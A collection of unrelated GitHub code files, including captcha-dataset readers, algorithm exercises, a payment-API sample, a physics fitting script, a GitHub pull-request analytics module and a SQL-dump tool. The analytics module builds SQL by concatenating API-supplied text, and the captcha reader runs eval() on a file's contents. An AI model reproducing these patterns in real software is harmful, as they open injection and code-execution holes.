document_root=settings.MEDIA_ROOT)\n","repo_name":"jameshnl232/CS50-Web-programming-with-Python-and-JavaScript","sub_path":"commerce/auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13355620480","text":"import os\n\nimport PIL.Image as Image\nimport numpy as np\n\nfrom paddle.io import Dataset\n\n\nclass Reader(Dataset):\n def __init__(self, data_path, is_val: bool = False):\n \"\"\"\n 数据读取器\n :param data_path: 数据集所在路径\n :param is_val: 是否为评估模式\n \"\"\"\n super().__init__()\n self.data_path = data_path\n # 因为数据集中图片的文件名是纯数字形式,这里不必去获取文件夹下的图片,直接使用range生成即可\n self.img_list = [str(i) + \".jpg\" for i in range(1, 800)]\n\n # 打开存放label数据的文件\n with open(os.path.join(data_path, \"label_dict.txt\"), 'r') as f:\n self.label_list = eval(f.read())\n\n # 划分数据集 - 该步骤可以重新设计逻辑,传入不同的路径来代表读取的数据集更佳,但因为本次数据集训练集和验证集咋同一个文件夹,故在此进行分割\n self.img_list = self.img_list[:500] if not is_val \\\n else self.img_list[500:800]\n\n def __getitem__(self, index):\n \"\"\"\n 获取一组数据\n :param index: 文件索引号\n :return:\n \"\"\"\n # 第一步打开图像文件并获取label值\n img_path = os.path.join(self.data_path, self.img_list[index])\n img = Image.open(img_path)\n img = np.array(img, dtype=\"float32\").flatten()\n img /= 255\n label = self.label_list[self.img_list[index]]\n label = np.array([label], dtype=\"int64\")\n return img, label\n\n def print_sample(self, index: int = 0):\n print(\"文件名\", self.img_list[index], \"\\t标签值\", self.label_list[self.img_list[index]])\n\n def __len__(self):\n return len(self.img_list)\n\n\nclass InferReader(Dataset):\n def __init__(self, dir_path=None, img_path=None):\n \"\"\"\n 数据读取Reader(推理)\n :param dir_path: 推理对应文件夹(二选一)\n :param img_path: 推理单张图片(二选一)\n \"\"\"\n super().__init__()\n if dir_path:\n # 获取文件夹中所有图片路径\n self.img_names = [i for i in os.listdir(dir_path) if os.path.splitext(i)[1] == \".jpg\"]\n self.img_paths = [os.path.join(dir_path, i) for i in self.img_names]\n elif img_path:\n self.img_names = [os.path.split(img_path)[1]]\n self.img_paths = [img_path]\n else:\n raise Exception(\"请指定需要预测的文件夹或对应图片路径\")\n\n def get_names(self):\n \"\"\"\n 获取推理文件名顺序\n \"\"\"\n return self.img_names\n\n def __getitem__(self, index):\n # 获取图像路径\n file_path = self.img_paths[index]\n # 使用Pillow来读取图像数据并转成Numpy格式\n img = Image.open(file_path)\n img = np.array(img, dtype=\"float32\").flatten() / 255\n return img\n\n def __len__(self):\n return len(self.img_paths)\n\n\nif __name__ == '__main__':\n DATA_PATH = \"/Users/zhanghongji/PycharmProjects/CaptchaDataset/Classify_Dataset\"\n 
Reader(DATA_PATH).print_sample(1)\n","repo_name":"GT-ZhangAcer/CaptchaDataset","sub_path":"Classify_Module/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"zh","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"28483887264","text":"# https://leetcode.com/problems/maximum-sum-of-two-non-overlapping-subarrays/description/\n\nfrom functools import cache\nfrom typing import List\n\nclass Solution:\n    def maxSumTwoNoOverlap(self, nums: List[int], firstLen: int, secondLen: int) -> int:\n        nums.append(0)\n        first = []\n        second = []\n        \n        l1, r1 = 0, firstLen\n        l2, r2 = 0, secondLen\n        sum1, sum2 = sum(nums[:firstLen]), sum(nums[:secondLen])\n        \n        while r1 < len(nums) or r2 < len(nums):\n            if r1 < len(nums):\n                first.append((sum1, l1, r1 - 1))\n                sum1 -= nums[l1]\n                sum1 += nums[r1]\n                l1 += 1\n                r1 += 1\n            \n            if r2 < len(nums):\n                second.append((sum2, l2, r2 - 1))\n                sum2 -= nums[l2]\n                sum2 += nums[r2]\n                l2 += 1\n                r2 += 1\n        \n        first.sort(reverse=True)\n        second.sort(reverse=True)\n        \n        @cache\n        def findMax(idx1, idx2):\n            if idx1 >= len(first) or idx2 >= len(second):\n                return -1\n            \n            if second[idx2][1] <= first[idx1][1] <= second[idx2][2]:\n                return max(findMax(idx1 + 1, idx2), findMax(idx1, idx2 + 1))\n            \n            if first[idx1][1] <= second[idx2][1] <= first[idx1][2]:\n                return max(findMax(idx1 + 1, idx2), findMax(idx1, idx2 + 1))\n            \n            return first[idx1][0] + second[idx2][0]\n        \n        return findMax(0, 0)\n    \n","repo_name":"nawrazi/competitive-programming","sub_path":"week_48/max-sum-of-two-non-overlapping-subarrays.py","file_name":"max-sum-of-two-non-overlapping-subarrays.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8692446476","text":"import os\n\ndef gradingStudents(grades):\n    # Write your code here\n    l =[]\n    for i in grades :\n        if i < 38 :\n            l.append(i)\n        else :\n            x=i\n            c=0\n            while not (x%5 == 0):\n                x+=1\n                c+=1\n            if c <=2 :\n                l.append(x)\n            else :\n                l.append(i)\n    return (l)\n\n\ngrades_count = int(input().strip())\n\ngrades = []\n\nfor _ in range(grades_count):\n    grades_item = int(input().strip())\n    grades.append(grades_item)\n\nresult = gradingStudents(grades)\n\nprint ('\\n'.join(map(str, result)))\n\n","repo_name":"wondmD/CSEC_CPD-solutions","sub_path":"grading Students.py","file_name":"grading Students.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69969061032","text":"import iyzipay\n\noptions = {\n    'api_key': iyzipay.api_key,\n    'secret_key': iyzipay.secret_key,\n    'base_url': iyzipay.base_url\n}\n\nrequest = {\n    'locale': 'tr',\n    'conversationId': '123456789',\n    'paymentId': '1',\n    'conversationData': 'conversation data'\n}\n\nthreeds_payment = iyzipay.ThreedsPayment().create(request, options)\n\nprint(threeds_payment.read().decode('utf-8'))\n","repo_name":"iyzico/iyzipay-python","sub_path":"samples/create_threeds_payment.py","file_name":"create_threeds_payment.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"72"} +{"seq_id":"18036508484","text":"import argparse\nimport json\nimport pandas as pd\nimport sys\nimport os\nimport pickle  # pickle.dump is used below to save the kinetic fit objects\n\nfrom KineticFittingClass import *\n\nsys.path.append('./../')\nimport FRET_modules.modulesPopulationFitting as PF\n\n# import numpy as np\n# # import matplotlib.pyplot as plt\n# # import pandas as pd\n# # from scipy.optimize import minimize\n# import os\n\n# import sys\n# 
sys.path.append('./../')\n# import modules.modulesCorrectionFactorsAndPlots as MCF\n# import modules.modulesPopulationFitting as PF\n# import PDA as PDA\n# import PDA_SSEResults as SSE\n# import TwoStateKineticModel as KM2S\n# import PDA_FastDescent as PDA_FD\n\n# See docs for full description of each method\nOPTIMISATION_METHODS = ['EndToEnd', \n 'LogSearch', \n 'Binned', \n 'Burst']\n# LOG_SEARCH_METHODS = ['EndToEnd']\n\nif __name__ == '__main__':\n # Define Parser for CLU\n parser = argparse.ArgumentParser(description='Probability Distribution Analysis for two state kinetic model, including gaussian spreading')\n parser.add_argument('-c','--config_path', help='Path to config file for parameter optimisation, see documentation for details', required=True)\n parser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\",action=\"store_true\")\n \n # Get Arguments\n args = parser.parse_args()\n arg_vars = vars(args)\n \n # Load Config file with optimisation details\n with open(arg_vars['config_path'], \"r\") as config_file:\n CONFIG = json.load(config_file)\n \n # Debug\n if args.verbose:\n print(CONFIG)\n \n # = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = \n # Unpack & Check Config\n # = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =\n DATA_PATH = CONFIG['DATA_PATH']\n ROOT_DIR = CONFIG['ROOT_DIR']\n GroupFeatureName = CONFIG['GroupFeatureName']\n\n EBinLower = CONFIG['EBinning']['EBinLower']\n EBinUpper = CONFIG['EBinning']['EBinUpper']\n NEBins = CONFIG['EBinning']['NEBins']\n EBins, EBinCentres, _ = PF.getBins(EBinLower,EBinUpper,NEBins)\n\n N_BURST_BINS = CONFIG['N_BURST_BINS']\n\n OPTIMISATION_METHOD = CONFIG['OPTIMISATION_METHOD']\n OPT_OPTIONS = CONFIG['OPT_OPTIONS']\n N0 = CONFIG['N']\n\n # GAUSSIAN_PARAMETERS\n r0 = CONFIG['GAUSSIAN_PARAMETERS']['r0']\n rDeviation = CONFIG['GAUSSIAN_PARAMETERS']['rDeviation']\n gaussianResolution = CONFIG['GAUSSIAN_PARAMETERS']['gaussianResolution']\n\n # Check optimisation method is handled\n assert OPTIMISATION_METHOD in OPTIMISATION_METHODS, \"optimisation method not handled, see documentation for choices and descriptions\"\n\n # = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =\n # Read & Optimise Data\n # = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =\n burst_data = pd.read_csv(DATA_PATH)\n # Group data\n burst_data_grouped = burst_data.groupby(GroupFeatureName)\n\n # Initialise Kinetic Fit Objects\n kineticFitDir = os.path.join(ROOT_DIR, 'fitObjects')\n os.makedirs(kineticFitDir, exist_ok=True)\n kfs = []\n for name, group in burst_data_grouped:\n kf = kineticFitting(rawBurstData=group, EBins=EBins, EBinCentres=EBinCentres, metaData={\n 'group_name': GroupFeatureName, 'group_value': name})\n kfs.append(kf)\n\n # Run various optmisations\n for i, kpair in enumerate([[10, 10], [100, 100], [1000, 1000], [10000, 10000]]):\n\n kf.optimiseBinnedPDA(saveDir=os.path.join(ROOT_DIR, f'{GroupFeatureName}_{name}/initial_pair_{i}'),\n intial_ks=kpair,\n nBurstBins=N_BURST_BINS,\n optimiseMethod='L-BFGS-B',\n optimiseOptions=OPT_OPTIONS,\n kbounds=((5, 5000), (5, 5000)))\n \n # Save kinetic fit object\n with 
open(os.path.join(kineticFitDir,f'kfObj_{GroupFeatureName}_{name}.pkl'), \"wb\") as f:\n pickle.dump(kf, f)\n","repo_name":"jackent601/FRET_PDA","sub_path":"RunKineticFitting.py","file_name":"RunKineticFitting.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36546131997","text":"# Print all sub arrays and get the max sum and ending index TC O(N^2)\n# Kadane's Algorithm TC O(N)\n\nimport logging\nfrom typing import List\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\ndef largestContiguousSubArray(arr: List[int]):\n \"\"\"\n\n :param arr:\n :return:\n\n Kadane's Algo\n TC : O(N)\n SC : O(1)\n \"\"\"\n\n length = len(arr)\n if length < 1:\n return 0\n\n max_so_far = 0\n end_index = -1\n current_max = 0\n\n for index, value in enumerate(arr):\n\n current_max = current_max + value\n\n if max_so_far < current_max:\n max_so_far = current_max\n end_index = index\n\n # Reset the value to 0 if its goes below 0\n if current_max < 0:\n current_max = 0\n\n logging.debug(\"index {} value {} current_max {} and max_so_far {}\".format(\n index, value, current_max, max_so_far\n ))\n\n return max_so_far\n\n\nif __name__ == '__main__':\n a = [-2, -3, 4, -1, -2, 1, 5, -3]\n print(\"1. Maximum contiguous sum is {}\".format(\n largestContiguousSubArray(a)\n ))","repo_name":"sakshamratra0106/PracticeProblems","sub_path":"DSAPracticeSheets/DynamicProgramming/1Maximumsumsubarray.py","file_name":"1Maximumsumsubarray.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22787107577","text":"class Solution:\r\n def isHappy(self, n: int) -> bool:\r\n return twoPointers(n)\r\n\r\ndef twoPointers(number):\r\n #Time: O(n)\r\n #Space: O(1)\r\n slow = number\r\n fast = squaredDigitsSummed(number)\r\n\r\n while True:\r\n if slow == 1 or fast == 1: return True\r\n elif slow == fast: return False\r\n \r\n slow = squaredDigitsSummed(slow)\r\n fast = squaredDigitsSummed((squaredDigitsSummed(fast)))\r\n \r\ndef hashSet(number):\r\n #Time: O(n)\r\n #Space: O(n)\r\n seen = set() #For detecting duplicates\r\n\r\n while True:\r\n if number in seen:\r\n return False\r\n else:\r\n seen.add(number)\r\n number = squaredDigitsSummed(number)\r\n if number == 1: return True\r\n\r\ndef squaredDigitsSummed(number):\r\n output = 0\r\n\r\n for char in str(number):\r\n output += int(char) ** 2\r\n \r\n return output","repo_name":"NaralC/Algorithms-Interview-Questions","sub_path":"Leetcode/Easy/0202-Happy-Number.py","file_name":"0202-Happy-Number.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15177960981","text":"'''Borrowed utils file from Elisabeth Shah'''\nfrom datetime import datetime\nfrom decouple import config\nimport pandas as pd\nimport os\nimport requests\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nfrom api.models import DB, Repo\nfrom api.queries import repo_query, initial_PR_query, cont_PR_query\n#Set secret and url for graph api, set date and seconds per hour for later\nSECRET = config('SECRET')\nURL = 'https://api.github.com/graphql'\nDATE_FORMAT = '%Y-%m-%dT%H:%M:%SZ'\nSECS_PER_HOUR = 3600\n#Querying the api for the user and repo requested\ndef run_query(query, variables):\n r = requests.post(URL,\n headers={'Authorization': 'token ' + SECRET, },\n 
json={'query': query,\n 'variables': variables\n })\n return r\n\n#Pull in the repo and organize the data\ndef pull_repo(owner, name):\n variables = {'owner': owner, 'name': name}\n response = run_query(repo_query, variables)\n data = response.json()['data']['repository']\n\n data['repoName'] = data['name']\n data['stars'] = data['stars']['totalCount']\n data['owner'] = data['owner']['login']\n data['primaryLanguage'] = data['primaryLanguage']['name']\n data['totalIssues'] = data['totalIssues']['totalCount']\n data['openIssues'] = data['openIssues']['totalCount']\n data['closedIssues'] = data['closedIssues']['totalCount']\n data['totalPRs'] = data['totalPRs']['totalCount']\n data['openPRs'] = data['openPRs']['totalCount']\n data['mergedPRs'] = data['mergedPRs']['totalCount']\n data['closedPRs'] = data['closedPRs']['totalCount']\n data['vulnerabilityAlerts'] = data['vulnerabilityAlerts']['totalCount']\n\n if (data['mergedPRs'] + data['closedPRs'] != 0):\n data['PRacceptanceRate'] = data['mergedPRs'] / (data['mergedPRs'] +\n data['closedPRs'])\n else:\n data['PRacceptanceRate'] = None\n data['createdAt'] = datetime.strptime(data['createdAt'],\n DATE_FORMAT)\n data['updatedAt'] = datetime.strptime(data['updatedAt'],\n DATE_FORMAT)\n data['ageInDays'] = (datetime.now().date() -\n data['createdAt'].date()).days\n data['starsPerDay'] = data['stars'] / data['ageInDays']\n data['forksPerDay'] = data['forks'] / data['ageInDays']\n data['PRsPerDay'] = data['totalPRs'] / data['ageInDays']\n data['issuesPerDay'] = data['totalIssues'] / data['ageInDays']\n\n return data\n\n#Summarize information contained within df\ndef summarize_PRs(pr_df):\n data = {}\n pr_df = pd.DataFrame(pr_df, index=[0])\n if pr_df.empty:\n data['uniquePRauthors'] = 0\n data['medianOpenPRhrsAge'] = None\n data['medianPRhrsToClose'] = None\n data['medianPRhrsToMerge'] = None\n else:\n #pr_df['author'] = [author.get('login') if author is not None else ''\n # for author in pr_df['author']]\n pr_df['createdAt'] = pd.to_datetime(pr_df['createdAt'],\n format=DATE_FORMAT)\n pr_df['closedAt'] = pd.to_datetime(pr_df['closedAt'],\n format=DATE_FORMAT)\n\n data['uniquePRauthors'] = pr_df['author'].nunique()\n\n openPRs = pr_df['state'] == 'OPEN'\n if openPRs.empty:\n data['medianOpenPRhrsAge'] = None\n else:\n openPRsecsAge = (datetime.now() -\n pr_df['createdAt']).dt.total_seconds()[openPRs]\n data['medianOpenPRhrsAge'] = openPRsecsAge.median()/SECS_PER_HOUR\n\n closedPRs = pr_df['state'] == 'CLOSED'\n if closedPRs.empty:\n data['medianPRhrsToClose'] = None\n else:\n PRsecsToClose = (pr_df['closedAt'] -\n pr_df['createdAt']).dt.total_seconds()[closedPRs]\n data['medianPRhrsToClose'] = PRsecsToClose.median()/SECS_PER_HOUR\n\n mergedPRs = pr_df['state'] == 'MERGED'\n if mergedPRs.empty:\n data['medianPRhrsToMerge'] = None\n else:\n PRsecsToMerge = (pr_df['closedAt'] -\n pr_df['createdAt']).dt.total_seconds()[mergedPRs]\n data['medianPRhrsToMerge'] = PRsecsToMerge.median()/SECS_PER_HOUR\n\n return data\n\n\ndef add_or_update_repo(owner, name, app):\n repo_dict = pull_repo(owner, name)\n\n variables = {'owner': owner, 'name': name}\n response = run_query(initial_PR_query, variables)\n data = response.json()['data']\n df = pd.DataFrame.from_records(data['repository']['pullRequests']['nodes'])\n\n i = 0\n while data['repository']['pullRequests']['pageInfo']['hasNextPage']:\n i += 1\n yield 'Processing PRs {} to {} - '.format((i-1)*50, i*50)\n cursor = data['repository']['pullRequests']['pageInfo']['endCursor']\n variables['cursor'] = cursor\n 
response = run_query(cont_PR_query, variables)\n yield 'cursor {}.<br>'.format(cursor)\n data = response.json()['data']\n df = df.append(pd.DataFrame.from_records(\n data['repository']['pullRequests']['nodes']))\n\n pr_dict = summarize_PRs(df)\n repo_dict.update(pr_dict)\n\n db_repo = Repo(owner=repo_dict['owner'],\n name=repo_dict['name'],\n description=repo_dict['description'],\n primary_language=repo_dict['primaryLanguage'],\n created_at=repo_dict['createdAt'],\n updated_at=repo_dict['updatedAt'],\n disk_usage=repo_dict['diskUsage'],\n stars=repo_dict['stars'],\n forks=repo_dict['forks'],\n total_issues=repo_dict['totalIssues'],\n open_issues=repo_dict['openIssues'],\n closed_issues=repo_dict['closedIssues'],\n total_PRs=repo_dict['totalPRs'],\n open_PRs=repo_dict['openPRs'],\n merged_PRs=repo_dict['mergedPRs'],\n closed_PRs=repo_dict['closedPRs'],\n vulnerabilities=repo_dict['vulnerabilityAlerts'],\n unique_PR_authors=repo_dict['uniquePRauthors'],\n PR_acceptance_rate=repo_dict['PRacceptanceRate'],\n median_open_PR_hrs_age=repo_dict['medianOpenPRhrsAge'],\n median_PR_hrs_to_merge=repo_dict['medianPRhrsToMerge'],\n median_PR_hrs_to_close=repo_dict['medianPRhrsToClose'],\n )\n with app.app_context():\n DB.session.merge(db_repo)\n DB.session.commit()\n yield '{} {} added!'.format(owner, name)\n\n\ndef update_pull_requests(conn, owner, name):\n '''Function takes in data returned from github apiv4\n as well as a postgresSQL connection object and pushes all\n pull requests contained in data to the repository, assuming their\n ids don't already exist'''\n variables = {'owner': owner, 'name': name}\n response = run_query(initial_PR_query, variables)\n data = response.json()['data']['repository']['pullRequests']['nodes']\n curs = conn.cursor()\n for i in range(len(data)):\n insert = (\"INSERT INTO PullRequests VALUES (\" +\n \"'\" + str(variables['name']) +\"'\" + \", \" +\n \"'\" + str(variables['owner']) +\"'\" + \", \" + \n \"'\" + str(data[i]['id']) +\"'\" + \", \" +\n \"'\" + str(data[i]['state']) +\"'\" + \", \" + \n \"'\" + str(data[i]['createdAt']) + \"'\" + \", \" +\n \"'\" + str(data[i]['closedAt']) + \"'\" + \", \" +\n \"'\" + str(data[i]['title'].replace(\"'\",\"\")) +\"'\" + \", \" + \n \"'\" + str(data[i]['bodyText'].replace(\"'\",\"\")) +\"'\" + \", \" +\n \"'\" + str(data[i]['author']['login']) +\"'\" + \", \" + \n \"'\" + str(data[i]['participants']['totalCount']) +\"'\" + \", \" + \n \"'\" + str(data[i]['comments']['totalCount']) +\"'\" + \", \" + \n \"'\" + str(data[i]['reactions']['totalCount'])+\"'\" + \", \" +\n \"'\" + str(data[i]['commits']['totalCount']) +\"'\" + \", \" + \n \"'\" + str(data[i]['changedFiles']) +\"'\" + \", \" +\n \"'\" + str(data[i]['additions']) +\"'\" + \", \" + \n \"'\" + str(data[i]['deletions']) + \"'\" + \") ON CONFLICT (ID) DO NOTHING\")\n curs.execute(insert)\n \n conn.commit()\n\nlemm = WordNetLemmatizer()\n\ndef lemmatize_text(text):\n #Create list of lemmatized words, return original sentences\n lemms = [lemm.lemmatize(w) for w in text.split()]\n return \" \".join(lemms)\n\ndef sentiment(conn, name):\n \"\"\"Collect commit message text from database\n run simple vader sentiment analysis and use\n compound score to generate score for each message\n then return the average sentiment score for a given repo\"\"\"\n\n curs = conn.cursor()\n text_query = f\"\"\"SELECT BodyText FROM PullRequests \n WHERE RepoName = '{name}'\"\"\"\n curs.execute(text_query)\n #Collect messages, convert to strings then replace punct\n text = 
pd.DataFrame(curs.fetchall(), columns=['text'])\n text['text'] = text['text'].astype(str).str.replace(\"[^\\w\\s]\",\"\")\n #Ensure none of the messages are empty\n text = text[text[\"text\"] != \"\"]\n text['text'] = text['text'].str.lower()\n text['text_lemmatized'] = text['text'].apply(lemmatize_text)\n #Generate scores, create list of compound scores, then return average\n sid = SentimentIntensityAnalyzer()\n scores = []\n for i in text[\"text_lemmatized\"]:\n score = sid.polarity_scores(i)\n scores.append(score)\n compounds = [x['compound'] for x in scores]\n if len(compounds) == 0:\n return \"You don't have any commit messages with body text!\"\n else:\n avg = sum(compounds)/len(compounds)\n return avg \n\n","repo_name":"BloomTech-Labs/github-commit-analysis-ds","sub_path":"api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32967859024","text":"#!/usr/bin/env python2\n\"\"\"DB Tool\n\nUsage:\n dbtool.py --showtables <file_path>\n dbtool.py --extract <file_path> --tables=tables [--encoding=enc]\n dbtool.py --extract <file_path> --tables=tables [--schema] [--encoding=enc]\n dbtool.py --mergeuser [--exit-on-error] [--user_id=user_id] [--pm_id=pm_id] [--pm_file_path=pm_file_path] <user_file_path> <csv_file_path>\n dbtool.py --json --type=type [--exit-on-error] [--forum=forum] \\\n [--topic=topic] [--recipient=recipient] [--pm=pm] \\\n --input=input\n\nOptions:\n -h --help Show this screen.\n --version Show version.\n --schema Export only schema\n --encoding=enc Encoding for sql parser\n --exit-on-error Exit if error happen\n --input=input Input for csv to json\n --forum=forum Input for post csv to json\n --topic=topic Input for post csv to json\n --recipient=recipient Input for pm csv to json\n --pm=pm Input for pm csv to json\n\"\"\"\nimport os\nimport re\nimport logging\nimport sys\n\nfrom docopt import docopt\nfrom tqdm import tqdm\nfrom dbtools.sql_to_csv import parse\nfrom dbtools.merge_user import (\n read_users,\n read_pm_user_ids,\n merge_users,\n merge_users_from_pm\n)\n\n__version__ = '0.1.0'\n__license__ = \"\"\"\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\"\"\"\n\n# Logging format\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setLevel(logging.DEBUG)\nhandler.setFormatter(\n logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n )\n)\n\n# Logging handler\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nlogger.addHandler(handler)\n\nget_table = re.compile(\n \"(?<=CREATE\\sTABLE\\s\\`).*?(?=\\`\\s)\",\n re.IGNORECASE\n)\n\n\ndef post_to_json(**kwargs):\n \"\"\"\n Handle convert merge csv of post to json\n :param kwargs:\n :return:\n \"\"\"\n\n # Import msg_to_json\n from dbtools.msg_to_json import (\n read_topics,\n msg_to_json\n )\n\n # Load variables\n csv_path = kwargs.get(\"csv_path\")\n exit_on_error = kwargs.get(\"exit_on_error\")\n forum = kwargs.get(\"forum\")\n\n # Read topics\n topic = kwargs.get(\"topic\")\n if topic:\n topic = read_topics(topic)\n\n # Iterate csv file\n for file_path in csv_path.split(\",\"):\n try:\n msg_to_json(\n file_path,\n forum,\n topic\n )\n except KeyboardInterrupt:\n logger.debug(\"Control-C pressed...\")\n sys.exit(138)\n except Exception as error:\n if exit_on_error:\n raise\n logger.debug(\n \"%s ERROR:%s\" % (file_path, error)\n )\n\n\ndef msg_to_json(**kwargs):\n \"\"\"\n Handle convert merge csv of message to json\n :param kwargs:\n :return:\n \"\"\"\n # Import pm_to_json\n from dbtools.pm_to_json import (\n read_pm_recipients,\n read_pm,\n msg_to_json\n )\n\n # Load variables\n csv_path = kwargs.get(\"csv_path\")\n exit_on_error = kwargs.get(\"exit_on_error\")\n\n # Read recipients\n pm_recipients = kwargs.get(\"pm_recipients\")\n if pm_recipients:\n pm_recipients = read_pm_recipients(pm_recipients)\n\n # Read pm text\n pmtext_pms = kwargs.get(\"pmtext_pms\")\n if pmtext_pms:\n pmtext_pms = read_pm(pmtext_pms)\n\n # Iterate csv file\n for file_path in csv_path.split(\",\"):\n try:\n msg_to_json(\n file_path,\n pm_recipients,\n pmtext_pms\n )\n except KeyboardInterrupt:\n logger.debug(\"Control-C pressed...\")\n sys.exit(138)\n except Exception as error:\n if exit_on_error:\n raise\n logger.debug(\n \"%s ERROR:%s\" % (file_path, error)\n )\n\n\ndef mergeuser(**kwargs):\n \"\"\"\n Handle merge user csv\n :param kwargs:\n :return:\n \"\"\"\n\n # Load param\n user_file_path = kwargs.get(\n \"user_file_path\"\n )\n csv_files_path = kwargs.get(\n \"csv_files_path\"\n )\n pm_file_path = kwargs.get(\n \"pm_file_path\"\n )\n exit_on_error = kwargs.get(\n \"exit_on_error\"\n )\n user_id = kwargs.get(\n \"user_id\"\n )\n pm_id = kwargs.get(\n \"pm_id\"\n )\n\n # Load users\n users, username_column = read_users(user_file_path)\n if not users:\n sys.exit(1)\n\n # Load pm ids if exist\n if pm_file_path:\n pm_user_ids = read_pm_user_ids(pm_file_path)\n\n for csv_file in csv_files_path.split(\",\"):\n try:\n if not pm_file_path:\n merge_users(\n csv_file,\n users,\n username_column,\n user_id\n )\n else:\n merge_users_from_pm(\n filepath=csv_file,\n pm_user_ids=pm_user_ids,\n users=users,\n username_column=username_column,\n pm_id=pm_id\n )\n except KeyboardInterrupt:\n logger.info(\"Control-C pressed...\")\n sys.exit(138)\n except Exception as error:\n if exit_on_error:\n raise\n\n logger.info(\"%s ERROR:%s\" % (csv_file, error))\n\n\ndef show_tables(**kwargs):\n \"\"\"\n Handle export all tables 
from sql dump\n    :param kwargs:\n        file_path => string: path to sql dump\n    :return: => string: list of all tables logged\n    \"\"\"\n    filepath = kwargs.get(\"<file_path>\")\n\n    # Table pool init\n    tables = []\n\n    # Load progress bar\n    pbar = tqdm(\n        desc=\"Parsing %s\" % filepath,\n        total=os.path.getsize(filepath),\n        unit=\"b\",\n        unit_scale=True\n    )\n\n    # Load sql dump\n    with open(filepath, \"rb\") as f:\n        # Iterate over the lines of the sql dump\n        for line in f:\n            # Advance the progress bar by the bytes just read\n            pbar.update(len(line))\n\n            # Skip lines that do not open a CREATE TABLE statement\n            if not line.startswith(\"CREATE TABLE\"):\n                continue\n\n            # Parse table name\n            table = get_table.search(line).group()\n\n            # Log duplicates, otherwise append the new table to the pool\n            if table in tables:\n                logger.info(\n                    \"Found table: %s but it already exists!\" % table\n                )\n            else:\n                logger.info(\n                    \"New table found: %s\" % table\n                )\n                tables.append(table)\n\n    # Close progress bar\n    pbar.close()\n\n    # Log all tables\n    logger.info(\n        \"All tables: %s\" % \", \".join(tables)\n    )\n\n\ndef main(args):\n    \"\"\"\n    Main process: dispatch every command line parameter\n    :param args:\n    :return:\n    \"\"\"\n    # Handle show tables\n    if args.get(\"--showtables\"):\n        show_tables(**args)\n\n    # Handle extract detail tables\n    if args.get(\"--extract\") and args.get(\"--tables\"):\n        parse(\n            filepath=args.get(\"<file_path>\"),\n            tables=args.get(\"--tables\"),\n            encoding=args.get(\"--encoding\"),\n            schema_only=args.get(\"--schema\")\n        )\n\n    # Handle merge user csv\n    if args.get(\"--mergeuser\"):\n        mergeuser(\n            user_file_path=args.get(\"<user_file_path>\"),\n            csv_files_path=args.get(\"<csv_file_path>\"),\n            pm_file_path=args.get(\"--pm_file_path\"),\n            exit_on_error=args.get(\"--exit-on-error\"),\n            user_id=args.get(\"--user_id\"),\n            pm_id=args.get(\"--pm_id\")\n        )\n\n    # Handle csv to json\n    if args.get(\"--json\"):\n        csv_type = args.get(\"--type\")\n\n        if csv_type not in [\"pm\", \"post\"]:\n            raise ValueError(\"Either: post or pm.\")\n\n        if csv_type == \"pm\":\n            msg_to_json(\n                csv_path=args.get(\"--input\"),\n                # docopt keeps the dashed option name (see the mergeuser branch)\n                exit_on_error=args.get(\"--exit-on-error\"),\n                pm_recipients=args.get(\"--recipient\"),\n                pmtext_pms=args.get(\"--pm\")\n            )\n        elif csv_type == \"post\":\n            post_to_json(\n                csv_path=args.get(\"--input\"),\n                exit_on_error=args.get(\"--exit-on-error\"),\n                forum=args.get(\"--forum\"),\n                topic=args.get(\"--topic\")\n            )\n\n\nif __name__ == \"__main__\":\n    args = docopt(__doc__, version=__version__)\n    